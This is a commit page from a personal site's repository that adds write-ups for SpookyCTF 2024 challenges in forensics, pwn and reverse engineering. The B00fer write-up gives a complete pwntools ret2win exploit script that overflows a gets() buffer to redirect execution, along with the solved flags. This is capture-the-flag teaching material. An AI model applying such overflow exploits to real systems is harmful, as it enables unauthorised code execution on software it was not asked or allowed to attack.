furtest/furtest.fr
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adds CTFs to content

Browse Source 
Add CTFs from 2024 to the content, htb apocalypse, spookyCTF,
buckeye ctf and some edits to the 404 ctf
This commit is contained in:
furtest
2025-06-27 14:45:23 +02:00
parent 8dea24f3a2
commit 34634f73c1
24 changed files with 2428 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
content/writeups/2024/spookyCTF/_index.md Normal file
View File

@@ -0,0 +1,12 @@
+++
date = '2024-10-28T09:17:00+02:00'
draft = false
title = 'Spooky ctf'
+++
The Spooky CTF is organised by NICC, NJIT's information & cybersecurity club.
You can check them out on [njiticc.com](https://njiticc.com/).
I mostly did bin (pwn and reverse) challenges as I started the CTF quite late.
On this site I separated the challenges in pwn and reverse categories but during the ctf both were mixed together.
In addition to the writeups below I also solved the web challenge Paranormal picture but didn't make a writeup for it.

25
content/writeups/2024/spookyCTF/forensic/wont_somebody_think_of_the_children/index.md Normal file
View File

@@ -0,0 +1,25 @@
+++
date = '2024-10-28T09:17:00+02:00'
draft = false
title = "Won't somebody think of the children"
tags = [ 'forensic' ]
+++
## Intro
Name: wont-somebody-think-of-the-children
Description: If Loab is back, we might need the council to help us out. The problem is that Anna sent Maya looking for them but she still hasn't come back. This is her last known location... Maybe you can help find her.
I'd go, but I really don't want to be around those spooky ghost orphans.
Author: [Cyb0rgSw0rd](https://github.com/alfredsimpson)
## Solve
We get a really large svg, after fiddling around a bit I open it with Inkscape and find that some layers have names that are different than the others.
So I disable every other layer and find the flag.
Both files are available (the one with every layer and the one with the flag).
![Original](yeoldeorphanarium.svg)
![Solved (some layer disabled)](./solved.svg)
The flag is : `NICC{H3ck_th3m_kids_what_@bout_the_council?}`

499
content/writeups/2024/spookyCTF/forensic/wont_somebody_think_of_the_children/solved.svg Normal file
View File

File diff suppressed because one or more lines are too long
Side by Side

After

Width:  |  Height:  |  Size: 28 MiB

131
content/writeups/2024/spookyCTF/forensic/wont_somebody_think_of_the_children/yeoldeorphanarium.svg Normal file
View File

File diff suppressed because one or more lines are too long
Side by Side

After

Width:  |  Height:  |  Size: 28 MiB

BIN
content/writeups/2024/spookyCTF/pwn/B00fer/B00fer Executable file
View File

Binary file not shown.

49
content/writeups/2024/spookyCTF/pwn/B00fer/exploit.py Executable file
View File

@@ -0,0 +1,49 @@
#!/usr/bin/python3
from pwn import *
# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
elif args.SSH:
exe = remote_exe
s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
return s.process([exe] + argv)
else: # Run locally
exe = local_exe
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
gdbscript = '''
'''.format(**locals())
# Set up pwntools for the correct architecture
local_exe = 'B00fer'
remote_exe = 'REMOTE'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(local_exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
#context.log_level = 'debug'
context.log_level = 'error'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
payload = flat(
b'\x00'*5*8,
p64(0x401227)
)
write("payload", payload)
io = start()
io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
io.recvline().decode()
print(io.recvline().decode())

1
content/writeups/2024/spookyCTF/pwn/B00fer/flag.txt Normal file
View File

@@ -0,0 +1 @@
Furtest{FAKE_FLAG}

85
content/writeups/2024/spookyCTF/pwn/B00fer/index.md Normal file
View File

@@ -0,0 +1,85 @@
+++
date = '2024-10-28T09:17:00+02:00'
draft = false
title = 'B00fer'
tags = [ 'pwn' ]
+++
## Intro
Name: B00fer
Description:
The Consortium sent us this file and connection info. Looks like they are taunting us.
They are running the file at b00fer.niccgetsspooky.xyz, at port 9001. Try to get them to give up the flag.
`nc b00fer.niccgetsspooky.xyz 9001`
Author: [Robert Blacha](https://github.com/RobertPBlacha)
This will be a pwn challenge seeing the name and the fact that we are given a remote.
We are only given the binary, no source code.
## Exploring
Running checksec we see :
- No stack canary
- No PIE
- The binary is not stripped
Running the program we are asked for an input without much info on what to enter.
Let's spin up ghidra and see what we're dealing with.
```C
int main(void)
{
char buffer [32];
setvbuf(stdout,(char *)0x0,2,0);
puts("Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n");
gets(buffer);
return 0;
}
```
So we are facing a classic ret2win challenge, we even have a beautiful function named win.
```c
void win(void)
{
char flag [40];
FILE *file;
file = fopen("flag.txt","r");
fread(flag,1,0x20,file);
puts(flag);
puts("Good!\n");
exit(1);
}
```
## Exploiting
We simply need to overwrite the return address of main to call win.
First let's compute the offset, using pwndbg we find that win is at `0x401227` and that the return address of main will be replaced by the 6th byte in the buffer.
To finish this we write a nice script using pwntools
```python
payload = flat(
b'\x00'*5*8,
p64(0x401227)
)
io = start()
io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
io.recvline().decode()
print(io.recvline().decode())
```
And we get the flag :
```bash
./exploit.py REMOTE b00fer.niccgetsspooky.xyz 9001
NICC{Sp00ked_the_fl4g_0ut_of_m3}
```

1338
content/writeups/2024/spookyCTF/reverse/my_assm_hurts/freezingprogram.txt Normal file
View File

File diff suppressed because it is too large Load Diff

31
content/writeups/2024/spookyCTF/reverse/my_assm_hurts/index.md Normal file
View File

@@ -0,0 +1,31 @@
+++
date = '2024-10-28T09:17:00+02:00'
draft = false
title = 'My assm hurts'
tags = [ 'reverse' ]
+++
## Intro
Name: my-assm-hurts
Description: As Mary was attempting to time travel, she slipped on a patch of ice and landed on her butt. While getting up from the ice, she found a cool-looking USB flash drive containing a file with some system code. Can you help Mary decrypt what information the file has?
Author: [TomB](https://github.com/Tomaszbrauntsch/)
This will be reverse.
We get a file that looks like assembly or some intermediate compilation step, who would want to read that.
## Solve
I asked chatgpt to solve the challenge for me, thank god it did, I really didn't want to read that.
There was a link to the original transcript but it's down now.
## Retranscription
In the following I removed some parts where I was trying to see if it was possible to compile the file.
- me : By analyzing the file tell me exactly what the program does
- chatgpt : blablabla, By analyzing the character codes (strings like string8, string10, etc.), the program builds the text "NICE_{Hey_this_is_COOL}", blablabla
- me (in my head) : *Humm this looks like a flag however it is not the right format lets ask again*
- me : Are you sure this is the right string, analyze again to make sure (use a different method)
- chatgpt : blablabla, the flag is `NICC{hEy_th1s-is_Co0L}`

32
content/writeups/2024/spookyCTF/reverse/the_gates_are_closed/index.md Normal file
View File

@@ -0,0 +1,32 @@
+++
date = '2024-10-28T09:17:00+02:00'
draft = false
title = 'The gates are closed'
tags = [ 'reverse' ]
+++
## Intro
Name: The gates are closed
Description: A USB drive was found in front of the locked gates of an abandoned cemetery. It may contain information regarding the strange sightings reported to nearby authorities in the graveyard, which NICC decided to investigate.
Author: [LoadinConfustion](https://github.com/loadinconfusion)
This will be a reverse engineering challenge as we are not provided a remote.
## Solve
I first execute the file and get : `Nothing is going on here... :D`
I then run `strings` on the file and get
```
_ITM_registerTMCloneTable
PTE1
u+UH
TklDQ3s0X1IzNGxfRmw0Z30=
Nothing is going on here... :D
;*3$"
GCC: (Debian 13.2.0-13) 13.2.0
Scrt1.o
```
We find a base64 encoded string, we decode it (`echo TklDQ3s0X1IzNGxfRmw0Z30= | base64 -d`) and get the flag.
`NICC{4_R34l_Fl4g}`

BIN
content/writeups/2024/spookyCTF/reverse/the_gates_are_closed/the-gates-are-closed Executable file
View File

Binary file not shown.

29
content/writeups/2024/spookyCTF/reverse/what_flag/index.md Normal file
View File

@@ -0,0 +1,29 @@
+++
date = '2024-10-28T09:17:00+02:00'
draft = false
title = 'What flag'
tags = [ 'reverse' ]
+++
## Intro
Name: what-flag
Description: NICC recieved a mysterious email with an executable file that does nothing. Can you figure out what this executable does?
Author: [TomB](https://github.com/Tomaszbrauntsch/)
This is reverse engineering.
The binary is not stripped, lets go with binary ninja.
## Solve
Main does nothing however we see a few functions named : u, h, h2, f, l, a, g
Looking inside of them we see what seems to be part of the flag.
Let's put these together
- u : `NI`
- h : `CC`
- h2 : `{`
- f : `uhH`
- l : `_fl@g`
- a : `_i`
- g : `_ThInk}`
We get : `NICC{uhH_fl@g_i_ThInk}`

BIN
content/writeups/2024/spookyCTF/reverse/what_flag/some-random-file Executable file
View File

Binary file not shown.